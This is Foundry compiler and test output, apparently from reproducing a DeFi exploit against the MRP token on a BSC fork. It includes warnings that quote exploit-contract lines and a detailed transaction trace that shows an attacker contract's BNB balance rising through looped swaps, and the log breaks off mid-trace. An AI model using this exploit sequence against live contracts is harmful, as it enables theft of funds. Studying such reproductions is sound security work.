Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.24s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (3628): This contract has a payable fallback function, but no receive ether function. Consider adding a receive ether function.
  --> src/test/2024-07/MRP_exp.sol:13:1:
   |
13 | contract Exploit is Test {
   | ^ (Relevant source part starts here and spans across multiple lines).
Note: The payable fallback function is defined here.
  --> src/test/2024-07/MRP_exp.sol:47:5:
   |
47 |     fallback() external payable {
   |     ^ (Relevant source part starts here and spans across multiple lines).

Warning (9302): Return value of low-level calls not used.
  --> src/test/2024-07/MRP_exp.sol:30:9:
   |
30 |         address(WMRP).call{value: 43.14 ether}("");
   |         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Warning (9302): Return value of low-level calls not used.
  --> src/test/2024-07/MRP_exp.sol:33:9:
   |
33 |         address(WMRP).call{value: 58 ether}("");
   |         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Warning (9302): Return value of low-level calls not used.
  --> src/test/2024-07/MRP_exp.sol:49:13:
   |
49 |             address(WMRP).call{value: 58 ether}("");
   |             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Warning (2018): Function state mutability can be restricted to pure
  --> src/test/2024-07/MRP_exp.sol:53:5:
   |
53 |     function on314Swaper() public returns (bytes4) {
   |     ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 506.85ms (3.32ms CPU time)

Ran 1 test for src/test/2024-07/MRP_exp.sol:Exploit
[PASS] testExploit() (gas: 1145335)
Logs:
  [Begin] Attacker BNB before exploit: 79228162514.264337593543950335
  attacker MRP balance :: 6083.630609350014281145
  [End] Attacker BNB after exploit: 79228162532.223503366385844692

Traces:
  [5830] Exploit::setUp()
    ├─ [0] VM::createSelectFork("bsc", 40122169 [4.012e7])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [1332835] Exploit::testExploit()
    ├─ emit log_named_decimal_uint(key: "[Begin] Attacker BNB before exploit", val: 79228162514264337593543950335 [7.922e28], decimals: 18)
    ├─ [126604] 0x35F5cEf517317694DF8c50C894080caA8c92AF7D::fallback{value: 43140000000000000000}()
    │   ├─ emit Swap(param0: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 40120200000000000000 [4.012e19], param2: 0, param3: 0, param4: 5119481591785219728266 [5.119e21])
    │   ├─  emit topic 0: 0x4a02abaeca79d731e9f710133314d8e1861f15fb1d3899fa232fe4b37839edac
    │   │        topic 1: 0x0000000000000000000000000000000000000000000000000007b0ee6dc68e7d
    │   │        topic 2: 0x000000000000000000000000000000000000000000000000004798c62f5b486e
    │   │           data: 0x
    │   ├─ emit Transfer(from: 0x35F5cEf517317694DF8c50C894080caA8c92AF7D, to: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 5119481591785219728266 [5.119e21])
    │   ├─ emit Transfer(from: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x0000000000000000000000000000000000000000, value: 5119481591785219728266 [5.119e21])
    │   ├─ emit Withdrawal(src: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], wad: 5119481591785219728266 [5.119e21])
    │   ├─ [56686] 0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3::transfer(Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 5119481591785219728266 [5.119e21])
    │   │   ├─ [638] Exploit::on314Swaper() [staticcall]
    │   │   │   └─ ← [Return] 0x00000000
    │   │   ├─ emit Transfer(from: 0x35F5cEf517317694DF8c50C894080caA8c92AF7D, to: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 5119481591785219728266 [5.119e21])
    │   │   ├─  storage changes:
    │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x0000000000000000000000000000000000000000000001158714478d7d60a38a
    │   │   │   @ 0x9849bee117044b5815b887430a57f82677ad60a98621c4c12706827168422e5c: 0x000000000000000000000000000000000000000000000193f6ec35b33ba41f80 → 0x00000000000000000000000000000000000000000000007e6fd7ee25be437bf6
    │   │   └─ ← [Return] true
    │   ├─  storage changes:
    │   │   @ 2: 0x000000000000000000000000000000000000000000000193f6ec35b33ba41f80 → 0x00000000000000000000000000000000000000000000007e6fd7ee25be437bf6
    │   │   @ 16: 0x000000000000000000000000000000000000000000000000003fe7d7c194b9f1 → 0x000000000000000000000000000000000000000000000000004798c62f5b486e
    │   │   @ 8: 0x0000000000000000000000000000000000000000000000015909559f752b174e → 0x00000000000000000000000000000000000000000000000182f1d1b929e4974e
    │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x0000000000000000000000000000000000000000000001158714478d7d60a38a
    │   │   @ 0x9849bee117044b5815b887430a57f82677ad60a98621c4c12706827168422e5c: 0x000000000000000000000000000000000000000000000193f6ec35b33ba41f80 → 0x00000000000000000000000000000000000000000000007e6fd7ee25be437bf6
    │   └─ ← [Stop]
    ├─ [45001] 0x35F5cEf517317694DF8c50C894080caA8c92AF7D::transfer(0x35F5cEf517317694DF8c50C894080caA8c92AF7D, 0)
    │   ├─  emit topic 0: 0xa27bed5336bc3d6f946bacb358044adbc6a3f608d76f56a1d98dd16d20041a8c
    │   │        topic 1: 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │        topic 2: 0x00000000000000000000000000000000000000000000000000000000668401ec
    │   │           data: 0x
    │   ├─  storage changes:
    │   │   @ 0x5f21d542f0332bb92b33ba73723f2cea8c276868d9605c67d4d389183322fec1: 0 → 1
    │   │   @ 0x5f21d542f0332bb92b33ba73723f2cea8c276868d9605c67d4d389183322fec2: 0 → 0x00000000000000000000000000000000000000000000000000000000668401ec
    │   └─ ← [Return] true
    ├─ [5438] 0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3::balanceOf(Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 5119481591785219728266 [5.119e21]
    ├─ [34540] 0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3::transfer(0x35F5cEf517317694DF8c50C894080caA8c92AF7D, 5119481591785219728266 [5.119e21])
    │   ├─ emit Transfer(from: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x35F5cEf517317694DF8c50C894080caA8c92AF7D, value: 5119481591785219728266 [5.119e21])
    │   ├─ [25200] 0x35F5cEf517317694DF8c50C894080caA8c92AF7D::handle(Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 5119481591785219728266 [5.119e21])
    │   │   ├─ emit Deposit(dst: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], wad: 5119481591785219728266 [5.119e21])
    │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 5119481591785219728266 [5.119e21])
    │   │   ├─  storage changes:
    │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x0000000000000000000000000000000000000000000001158714478d7d60a38a
    │   │   │   @ 2: 0x00000000000000000000000000000000000000000000007e6fd7ee25be437bf6 → 0x000000000000000000000000000000000000000000000193f6ec35b33ba41f80
    │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    │   ├─  storage changes:
    │   │   @ 0x9849bee117044b5815b887430a57f82677ad60a98621c4c12706827168422e5c: 0x00000000000000000000000000000000000000000000007e6fd7ee25be437bf6 → 0x000000000000000000000000000000000000000000000193f6ec35b33ba41f80
    │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x0000000000000000000000000000000000000000000001158714478d7d60a38a → 0
    │   └─ ← [Return] true
    ├─ [77412] 0x35F5cEf517317694DF8c50C894080caA8c92AF7D::fallback{value: 58000000000000000000}()
    │   ├─ emit Transfer(from: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x35F5cEf517317694DF8c50C894080caA8c92AF7D, value: 2316442069327357881135 [2.316e21])
    │   ├─ emit Transfer(from: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x0000000000000000000000000000000000000000, value: 2803039522457861847131 [2.803e21])
    │   ├─ emit Withdrawal(src: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], wad: 2803039522457861847131 [2.803e21])
    │   ├─ [30686] 0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3::transfer(Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 2803039522457861847131 [2.803e21])
    │   │   ├─ [638] Exploit::on314Swaper() [staticcall]
    │   │   │   └─ ← [Return] 0x00000000
    │   │   ├─ emit Transfer(from: 0x35F5cEf517317694DF8c50C894080caA8c92AF7D, to: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 2803039522457861847131 [2.803e21])
    │   │   ├─  storage changes:
    │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x000000000000000000000000000000000000000000000097f3fcda89196d785b
    │   │   │   @ 0x9849bee117044b5815b887430a57f82677ad60a98621c4c12706827168422e5c: 0x000000000000000000000000000000000000000000000193f6ec35b33ba41f80 → 0x0000000000000000000000000000000000000000000000fc02ef5b2a2236a725
    │   │   └─ ← [Return] true
    │   ├─ emit MintLP(param0: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 1385401643778988885614 [1.385e21])
    │   ├─ emit Swap(param0: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 58000000000000000000 [5.8e19], param2: 2316442069327357881135 [2.316e21], param3: 0, param4: 0)
    │   ├─  emit topic 0: 0x543dbefd6be36513483da4067033c4bf24f77a64b43b2cf5af5e3ea0c38186fc
    │   │        topic 1: 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │           data: 0x
    │   ├─  storage changes:
    │   │   @ 0x5f21d542f0332bb92b33ba73723f2cea8c276868d9605c67d4d389183322fec3: 0 → 0x00000000000000000000000000000000000000000000004b1a4f5ed830e4c66e
    │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x0000000000000000000000000000000000000000000001158714478d7d60a38a → 0x000000000000000000000000000000000000000000000097f3fcda89196d785b
    │   │   @ 2: 0x000000000000000000000000000000000000000000000193f6ec35b33ba41f80 → 0x0000000000000000000000000000000000000000000000fc02ef5b2a2236a725
    │   │   @ 0x9849bee117044b5815b887430a57f82677ad60a98621c4c12706827168422e5c: 0x00000000000000000000000000000000000000000000007e6fd7ee25be437bf6 → 0x0000000000000000000000000000000000000000000000fc02ef5b2a2236a725
    │   │   @ 7: 0x00000000000000000000000000000000000000000000004b9e55fa63577f4c6b → 0x000000000000000000000000000000000000000000000096b8a5593b886412d9
    │   │   @ 0x5f21d542f0332bb92b33ba73723f2cea8c276868d9605c67d4d389183322fec1: 1 → 0
    │   │   @ 0x5f21d542f0332bb92b33ba73723f2cea8c276868d9605c67d4d389183322fec2: 0x00000000000000000000000000000000000000000000000000000000668401ec → 0
    │   └─ ← [Stop]
    ├─ [98426] 0x35F5cEf517317694DF8c50C894080caA8c92AF7D::transfer(Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   ├─  emit topic 0: 0x585256dd91f05733b2d0c6476cca13587b367dcfcbcd9c79561b81a990c68212
    │   │        topic 1: 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │           data: 0x00000000000000000000000000000000000000000000004b1a4f5ed830e4c66e
    │   ├─ [49515] Exploit::fallback{value: 57999999999999999999}()
    │   │   ├─ [42204] 0x35F5cEf517317694DF8c50C894080caA8c92AF7D::fallback{value: 58000000000000000000}()
    │   │   │   ├─ emit Swap(param0: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 53940000000000000000 [5.394e19], param2: 0, param3: 0, param4: 2232149017564794552880 [2.232e21])
    │   │   │   ├─  emit topic 0: 0x4a02abaeca79d731e9f710133314d8e1861f15fb1d3899fa232fe4b37839edac
    │   │   │   │        topic 1: 0x000000000000000000000000000000000000000000000000000a572635d43d05
    │   │   │   │        topic 2: 0x0000000000000000000000000000000000000000000000000051efec652f8573
    │   │   │   │           data: 0x
    │   │   │   ├─ emit Transfer(from: 0x35F5cEf517317694DF8c50C894080caA8c92AF7D, to: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 2232149017564794552880 [2.232e21])
    │   │   │   ├─ emit Transfer(from: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x0000000000000000000000000000000000000000, value: 2232149017564794552880 [2.232e21])
    │   │   │   ├─ emit Withdrawal(src: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], wad: 2232149017564794552880 [2.232e21])
    │   │   │   ├─ [7986] 0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3::transfer(Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 2232149017564794552880 [2.232e21])
    │   │   │   │   ├─ [638] Exploit::on314Swaper() [staticcall]
    │   │   │   │   │   └─ ← [Return] 0x00000000
    │   │   │   │   ├─ emit Transfer(from: 0x35F5cEf517317694DF8c50C894080caA8c92AF7D, to: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 2232149017564794552880 [2.232e21])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x9849bee117044b5815b887430a57f82677ad60a98621c4c12706827168422e5c: 0x0000000000000000000000000000000000000000000000fc02ef5b2a2236a725 → 0x00000000000000000000000000000000000000000000008301a5021f2b7724f5
    │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x000000000000000000000000000000000000000000000097f3fcda89196d785b → 0x000000000000000000000000000000000000000000000110f5473394102cfa8b
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 8: 0x00000000000000000000000000000000000000000000000182f1d1b929e4974e → 0x000000000000000000000000000000000000000000000001bb49d63665fa974e
    │   │   │   │   @ 16: 0x000000000000000000000000000000000000000000000000004798c62f5b486e → 0x0000000000000000000000000000000000000000000000000051efec652f8573
    │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x000000000000000000000000000000000000000000000110f5473394102cfa8b
    │   │   │   │   @ 2: 0x0000000000000000000000000000000000000000000000fc02ef5b2a2236a725 → 0x00000000000000000000000000000000000000000000008301a5021f2b7724f5
    │   │   │   │   @ 0x9849bee117044b5815b887430a57f82677ad60a98621c4c12706827168422e5c: 0x0000000000000000000000000000000000000000000000fc02ef5b2a2236a725 → 0x00000000000000000000000000000000000000000000008301a5021f2b7724f5
    │   │   │   └─ ← [Stop]
    │   │   └─ ← [Stop]
    │   ├─ emit Transfer(from: 0x35F5cEf517317694DF8c50C894080caA8c92AF7D, to: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 2316442069327357881134 [2.316e21])
    │   ├─ emit Transfer(from: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x0000000000000000000000000000000000000000, value: 2316442069327357881134 [2.316e21])
    │   ├─ emit Withdrawal(src: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], wad: 2316442069327357881134 [2.316e21])
    │   ├─ [7986] 0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3::transfer(Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 2316442069327357881134 [2.316e21])
    │   │   ├─ [638] Exploit::on314Swaper() [staticcall]
    │   │   │   └─ ← [Return] 0x00000000
    │   │   ├─ emit Transfer(from: 0x35F5cEf517317694DF8c50C894080caA8c92AF7D, to: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 2316442069327357881134 [2.316e21])
    │   │   ├─  storage changes:
    │   │   │   @ 0x9849bee117044b5815b887430a57f82677ad60a98621c4c12706827168422e5c: 0x00000000000000000000000000000000000000000000008301a5021f2b7724f5 → 0x0000000000000000000000000000000000000000000000056e8d951ac783f9c7
    │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x000000000000000000000000000000000000000000000110f5473394102cfa8b → 0x00000000000000000000000000000000000000000000018e885ea098742025b9
    │   │   └─ ← [Return] true
    │   ├─  storage changes:
    │   │   @ 2: 0x00000000000000000000000000000000000000000000008301a5021f2b7724f5 → 0x0000000000000000000000000000000000000000000000056e8d951ac783f9c7
    │   │   @ 0x5f21d542f0332bb92b33ba73723f2cea8c276868d9605c67d4d389183322fec3: 0x00000000000000000000000000000000000000000000004b1a4f5ed830e4c66e → 0
    │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x000000000000000000000000000000000000000000000097f3fcda89196d785b → 0x00000000000000000000000000000000000000000000018e885ea098742025b9
    │   │   @ 7: 0x000000000000000000000000000000000000000000000096b8a5593b886412d9 → 0x00000000000000000000000000000000000000000000004b9e55fa63577f4c6b
    │   │   @ 0x9849bee117044b5815b887430a57f82677ad60a98621c4c12706827168422e5c: 0x00000000000000000000000000000000000000000000008301a5021f2b7724f5 → 0x0000000000000000000000000000000000000000000000056e8d951ac783f9c7
    │   └─ ← [Return] true
    ├─ [50451] 0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3::transfer(0x35F5cEf517317694DF8c50C894080caA8c92AF7D, 1268000000000000000000 [1.268e21])
    │   ├─ emit Transfer(from: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x35F5cEf517317694DF8c50C894080caA8c92AF7D, value: 1268000000000000000000 [1.268e21])
    │   ├─ [43111] 0x35F5cEf517317694DF8c50C894080caA8c92AF7D::handle(Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1268000000000000000000 [1.268e21])
    │   │   ├─ emit Deposit(dst: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], wad: 1268000000000000000000 [1.268e21])
    │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 1268000000000000000000 [1.268e21])
    │   │   ├─ emit Transfer(from: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x35F5cEf517317694DF8c50C894080caA8c92AF7D, value: 1268000000000000000000 [1.268e21])
    │   │   ├─ emit Swap(param0: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 0, param2: 1268000000000000000000 [1.268e21], param3: 104111205558267988183 [1.041e20], param4: 0)
    │   │   ├─  emit topic 0: 0x4a02abaeca79d731e9f710133314d8e1861f15fb1d3899fa232fe4b37839edac
    │   │   │        topic 1: 0x0000000000000000000000000000000000000000000000000007f4700c69bdd5
    │   │   │        topic 2: 0x0000000000000000000000000000000000000000000000000059e45c71994348
    │   │   │           data: 0x
    │   │   ├─ [96] Exploit::fallback{value: 100987869391519948538}()
    │   │   │   └─ ← [Stop]
    │   │   ├─  storage changes:
    │   │   │   @ 0x9849bee117044b5815b887430a57f82677ad60a98621c4c12706827168422e5c: 0x0000000000000000000000000000000000000000000000056e8d951ac783f9c7 → 0x00000000000000000000000000000000000000000000004a2b9686f3e2d3f9c7
    │   │   │   @ 2: 0x0000000000000000000000000000000000000000000000056e8d951ac783f9c7 → 0x00000000000000000000000000000000000000000000004a2b9686f3e2d3f9c7
    │   │   │   @ 16: 0x0000000000000000000000000000000000000000000000000051efec652f8573 → 0x0000000000000000000000000000000000000000000000000059e45c71994348
    │   │   │   @ 8: 0x000000000000000000000000000000000000000000000001bb49d63665fa974e → 0x000000000000000000000000000000000000000000000001e6a227e87320412b
    │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    │   ├─  storage changes:
    │   │   @ 0x9849bee117044b5815b887430a57f82677ad60a98621c4c12706827168422e5c: 0x0000000000000000000000000000000000000000000000056e8d951ac783f9c7 → 0x00000000000000000000000000000000000000000000004a2b9686f3e2d3f9c7
    │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x00000000000000000000000000000000000000000000018e885ea098742025b9 → 0x000000000000000000000000000000000000000000000149cb55aebf58d025b9
    │   └─ ← [Return] true
    ├─ [43001] 0x35F5cEf517317694DF8c50C894080caA8c92AF7D::transfer(0x35F5cEf517317694DF8c50C894080caA8c92AF7D, 0)
    │   ├─  emit topic 0: 0xa27bed5336bc3d6f946bacb358044adbc6a3f608d76f56a1d98dd16d20041a8c
    │   │        topic 1: 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │        topic 2: 0x00000000000000000000000000000000000000000000000000000000668401ec
    │   │           data: 0x
    │   ├─  storage changes:
    │   │   @ 0x5f21d542f0332bb92b33ba73723f2cea8c276868d9605c67d4d389183322fec1: 0 → 1
    │   │   @ 0x5f21d542f0332bb92b33ba73723f2cea8c276868d9605c67d4d389183322fec2: 0 → 0x00000000000000000000000000000000000000000000000000000000668401ec
    │   └─ ← [Return] true
    ├─ [1438] 0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3::balanceOf(Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 6083630609350014281145 [6.083e21]
    ├─ [324] 0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3::decimals() [staticcall]
    │   └─ ← [Return] 18
    ├─ emit log_named_decimal_uint(key: "attacker MRP balance :", val: 6083630609350014281145 [6.083e21], decimals: 18)
    ├─ [1438] 0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3::balanceOf(Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 6083630609350014281145 [6.083e21]
    ├─ [1438] 0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3::balanceOf(Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 6083630609350014281145 [6.083e21]
    ├─ [82674] 0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3::transfer(0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3, 304181530467500714057 [3.041e20])
    │   ├─ emit Transfer(from: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x000000000000000000000000000000000000dEaD, value: 304181530467500714057 [3.041e20])
    │   ├─ emit Swap(param0: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 0, param2: 0, param3: 953226125332733990 [9.532e17], param4: 304181530467500714057 [3.041e20])
    │   ├─ [0] 0x2712c550f5f92001057dbF277d479C7a35e37343::fallback{value: 47661306266636699}()
    │   │   └─ ← [Stop]
    │   ├─ [86] Exploit::fallback{value: 905564819066097291}()
    │   │   └─ ← [Stop]
    │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x70c4acA828e79e22d73dEDbd80FA99E585db3bf1, value: 9125445914025021421 [9.125e18])
    │   ├─ [14197] 0x70c4acA828e79e22d73dEDbd80FA99E585db3bf1::cae618f5(0000000000000000000000000000000000000000000000007ea418b5ca804fed)
    │   │   ├─  emit topic 0: 0x4a02abaeca79d731e9f710133314d8e1861f15fb1d3899fa232fe4b37839edac
    │   │   │        topic 1: 0x000000000000000000000000000000000000000000000000000041f3c8b59d84
    │   │   │        topic 2: 0x000000000000000000000000000000000000000000000000121282c55ab4e93d
    │   │   │           data: 0x
    │   │   ├─  storage changes:
    │   │   │   @ 21: 0x000000000000000000000000000000000000000000000000121240d191ff4bb9 → 0x000000000000000000000000000000000000000000000000121282c55ab4e93d
    │   │   └─ ← [Stop]
    │   ├─ emit Transfer(from: 0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3, to: 0x000000000000000000000000000000000000dEaD, value: 304181530467500714057 [3.041e20])
    │   ├─  storage changes:
    │   │   @ 0x44ad89ba62b98ff34f51403ac22759b55759460c0bb5521eb4b6ee3cff49cf83: 0x00000000000000000000000000000000000000000000b869f959e655b1bdaf2b → 0x00000000000000000000000000000000000000000000b88af415ab026dd27fbd
    │   │   @ 2: 0x000000000000000000000000000000000000000000013bf1c26747454e2c13a4 → 0x000000000000000000000000000000000000000000013bf2410b5ffb18ac6391
    │   │   @ 0x341263f220d004e7e8d2daf4614b523a5376276d8aedce0bcf33e2d783856879: 0x000000000000000000000000000000000000000000001415894ecf13c48cda4a → 0x00000000000000000000000000000000000000000000141607f2e7c98f0d2a37
    │   │   @ 21: 0x000000000000000000000000000000000000000000000000121240d191ff4bb9 → 0x000000000000000000000000000000000000000000000000121282c55ab4e93d
    │   │   @ 17: 0x000000000000000000000000000000000000000000000085ff100fff1b9777a0 → 0x00000000000000000000000000000000000000000000008605343e44ee44e8fa
    │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x000000000000000000000000000000000000000000000149cb55aebf58d025b9 → 0x0000000000000000000000000000000000000000000001394df7cc68fac5bd70
    │   │   @ 0x6331b79fa0223994f124e222109c04b61a8775ba12e0823995bc27904fb5e60e: 0x000000000000000000000000000000000000000000001c65b1abd8f4eba0e009 → 0x000000000000000000000000000000000000000000001c55344df69e8d9677c0
    │   └─ ← [Return] true
    ├─ [36874] 0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3::transfer(0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3, 304181530467500714057 [3.041e20])
    │   ├─ emit Transfer(from: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x000000000000000000000000000000000000dEaD, value: 304181530467500714057 [3.041e20])
    │   ├─ emit Swap(param0: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 0, param2: 0, param3: 953226125332733990 [9.532e17], param4: 304181530467500714057 [3.041e20])
    │   ├─ [0] 0x2712c550f5f92001057dbF277d479C7a35e37343::fallback{value: 47661306266636699}()
    │   │   └─ ← [Stop]
    │   ├─ [86] Exploit::fallback{value: 905564819066097291}()
    │   │   └─ ← [Stop]
    │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x70c4acA828e79e22d73dEDbd80FA99E585db3bf1, value: 9125445914025021421 [9.125e18])
    │   ├─ [3397] 0x70c4acA828e79e22d73dEDbd80FA99E585db3bf1::cae618f5(0000000000000000000000000000000000000000000000007ea418b5ca804fed)
